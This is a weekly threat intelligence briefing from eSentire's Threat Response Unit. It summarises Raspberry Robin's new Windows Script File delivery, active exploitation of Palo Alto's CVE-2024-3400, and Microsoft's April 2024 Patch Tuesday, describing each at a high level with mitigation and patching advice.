eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Recent Threat Intelligence Advisories
Noteworthy News
Raspberry Robin Spreading Through Windows Script Files
Bottom Line: Raspberry Robin's shift to using Windows Scripting Files highlights the malware's adaptability and the increasing sophistication of threats that organizations face today. This change aims to enhance the malware’s evasion capabilities and increase its infection rate.
Raspberry Robin, a notorious Windows worm first identified in late 2021, has evolved significantly in its infection vectors, spreading mechanisms, and the complexity of its operations. Initially observed targeting technology and manufacturing organizations, it has since evolved into one of the most prevalent threats impacting a wide array of sectors.
Previously, Raspberry Robin spread primarily through infected USB drives and was known to host its payloads on compromised QNAP servers. On April 10th, HP Threat Research released a report revealing a shift towards distributing the malware via Windows Script Files (WSF), a method that allows the worm to exploit administrative scripts within Windows environments. These script files are highly obfuscated and utilize anti-VM and anti-analysis techniques to ensure execution on targeted machines, thus evading traditional detection methods.
The WSF downloader used by Raspberry Robin features complex anti-analysis measures such as obfuscation, environment checks, and execution guards. The scripts are heavily obfuscated, with junk characters and misleading code structures designed to hinder analysis. It performs rigorous checks to determine if it is running in a virtualized or analysis environment by assessing system details such as the OS version, CPU type, and active security processes. The downloader includes checks for VM-specific hardware and system settings, terminating itself if any indications of a non-genuine environment are detected.
eSentire Threat Intelligence Analysis:
The recent change from spreading through USB devices to now heavily obfuscated Windows scripting files, highlights the continuous efforts of the Raspberry Robin actors to evade security defenses. This new delivery method will likely aid the malware in infecting a wider range of victims, resulting in an increase in stolen credentials and even ransomware as it has been observed in the past.
Raspberry Robin's flexibility is highlighted by its ability to download and execute a variety of secondary payloads including SocGholish, Cobalt Strike, IcedID, BumbleBee, and Truebot. Additionally, Raspberry Robin's architecture allows it to act as a precursor to ransomware attacks. By establishing initial access and deploying payloads like Cobalt Strike, attackers can maneuver within the network to identify valuable targets for encryption and ransom demands. This capability effectively transforms the malware into a versatile platform for conducting further malicious activities. eSentire’s Threat Intelligence team has previously published an analysis of Raspberry Robin malware.
According to a report released in February 2024 by Check Point Research, the threat actors behind Raspberry Robin have been exploiting vulnerabilities either before or shortly after they were publicly disclosed. The speed at which Raspberry Robin incorporates new exploits into its arsenal is notable. Previously, the malware utilized exploits that were up to a year old. Now, it incorporates exploits that are fresh off their discovery, such as CVE-2023-36802, which was used within weeks of its public disclosure. This rapid incorporation suggests that the operators are likely purchasing these exploits from developers rather than crafting them in-house, prioritizing speed to capitalize on unpatched systems.
Given the evolving nature of Raspberry Robin, organizations are advised to implement multi-layered security strategy that emphasizes both proactive measures and reactive capabilities. A few key strategies to consider are implementing a robust patch management process to ensure all systems are up-to-date, deploying advanced Endpoint Detection and Response (EDR) tools that can detect, analyze, and respond to suspicious activities on endpoints, and educating employees about the risks of malware, particularly through social engineering and phishing attacks which might lead to unauthorized installations of Raspberry Robin.
Raspberry Robin has emerged as a formidable threat in the cybersecurity landscape, showcasing a high degree of adaptability and sophistication in its methods of spreading and exploiting vulnerabilities. Its evolution indicates that threat actors are continuously enhancing their methods to bypass traditional security measures. This requires organizations to stay vigilant and proactive in updating their cybersecurity defenses against these evolving threats.
Critical Vulnerability in Palo Alto Networks Exploited
Bottom Line: Due to the wide use of Palto Alto Network appliances, vulnerabilities found in their products are a highly valuable target for attackers. As CVE-2024-3400 (CVSS: 10) is already being exploited, it is important for customers using the firewall to apply mitigations and closely follow Palo Alto Network’s updates regarding the fixes to the impacted PAN-OS.
On April 12th, Palo Alto Networks released an advisory on a critical vulnerability which is being actively exploited, impacting the PAN-OS operating system running on their appliances. The vulnerability tracked as CVE-2024-3400 (CVSS: 10), is a command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software. The exploitation of CVE-2024-3400 would allow an unauthenticated remote attacker to execute arbitrary code with root privileges on the firewall. The vulnerability was identified in PAN-OS versions 10.2, 11.0, and 11.1.
The vulnerability, and real-world exploitation, were identified by Volexity, who reported their findings to Palo Alto Networks. According to both companies, exploitation is ongoing, impacting multiple organizations. Palo Alto’s Unit42 has released a report including limited details on observed attacks and known Indicators of Compromise (IoCs); the current campaign is being tracked under the name Operation MidnightEclipse. After initial exploitation, threat actors have been observed deploying reverse shells and the UPSTYLE backdoor, as well as executing a variety of commands on the firewall including copying and exfiltrating configuration files. Volexity tracks the threat actor group behind Operation MidnightEclipse as UAT0218.
Palo Alto Networks released security patches to address CVE-2024-3400 on April 14th, 2024. If patching is not possible, it is critical that organizations apply the available mitigations to prevent exploitation; organizations are recommended to enable Vulnerability Protection for the GlobalProtect interface, and companies that subscribe to Palo Alto Threat Prevention should enable Threat ID 95187 to block attacks.
eSentire Threat Intelligence Analysis:
While details on real-world attacks are still limited, it is critical that organizations immediately apply the relevant mitigations as attacks are ongoing. According to Volexity, exploitation was first observed on March 26th, 2024, but it is possible that attacks have been ongoing prior to this date. As such, all potentially impacted organizations should review Palo Alto firewalls for signs of compromise and unusual activity.
Vulnerabilities in Internet-facing applications, such as CVE-2024-3400, are high-value for threat actors, as they offer an avenue for initial access into victim organizations. As the vulnerability has only recently been disclosed and technical details are minimal, it is likely that only a single threat actor group is exploiting the vulnerability at this time. The eSentire Threat Intelligence team assesses with high confidence that the disclosure of technical details and Proof-of-Concept (PoC) exploit code, will result in the widespread adoption of the exploit by various threat actor groups.
In response to the disclosure of CVE-2024-3400, eSentire released a security advisory on April 12th. We have also released an updated security advisory on April 16th. Additionally, threat hunts have been performed across the eSentire customer base, and eSentire Managed Vulnerability Service (MVS) has plugins in place to identify vulnerable devices.
Microsoft Patch Tuesday Release
Bottom Line: April 9th marked Microsoft’s monthly Patch Tuesday release. This month, Microsoft highlighted two vulnerabilities that are being actively exploited in the wild. Organizations are strongly recommended to review the full Microsoft release and apply all relevant security patches.
In the April 9th Microsoft Patch Tuesday release, Microsoft addressed a total of 149 vulnerabilities, including 67 Remote Code Execution (RCE) vulnerabilities. Most notably, the release includes one confirmed zero-day vulnerability, and a second that Microsoft has not stated is exploited, but the researchers that discovered the vulnerability, state is exploited.
The vulnerability that Microsoft has confirmed to be exploited in the wild is tracked as CVE-2024-26234 (CVSS: 6.7) - Proxy Driver Spoofing vulnerability. In real-world attacks, the vulnerability was exploited to disguise malicious content in a campaign delivering a backdoor malware to victims.
CVE-2024-29988 (CVSS: 8.8) is disputed, with researchers stating that exploitation is ongoing, but Microsoft classifies the vulnerability as “Exploitation more likely”. The vulnerability is tracked as SmartScreen Prompt Security Feature Bypass vulnerability. In an attack scenario, a threat actor would deliver a maliciously crafted file to a potential victim; interaction with the malicious file would enable code execution, bypassing the SmartScreen security feature.
Organizations are strongly recommended to review the full Microsoft Patch Tuesday release for April 2024, and ensure security patches are applied for all impacted systems.
eSentire Threat Intelligence Analysis:
Microsoft's comprehensive response to these vulnerabilities through its Patch Tuesday updates emphasizes the critical importance of regular and thorough security practices, including vulnerability management and the prompt application of patches. It also highlights the challenges faced in securing complex software ecosystems against an ever-changing threat landscape. Managed vulnerability services can greatly assist organizations in the identification of vulnerabilities and the prioritization of patch deployment.
This is by far the largest Patch Tuesday release of the year, addressing 149 vulnerabilities. The maximum number of vulnerabilities disclosed in a 2024 patch release by Microsoft was 74 in February. The majority of Remote Code Execution vulnerabilities from this release are found within Microsoft SQL drivers, indicating they likely share a common flaw, although Microsoft has not shared technical details to confirm this.
The eSentire Threat Intelligence team continues to track the recently disclosed vulnerabilities for additional details and detection opportunities. Threat hunts have been performed for exploitation of CVE-2024-26234, based on Indicators of Compromise (IoCs) shared by Sophos.
About the threat briefings:
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
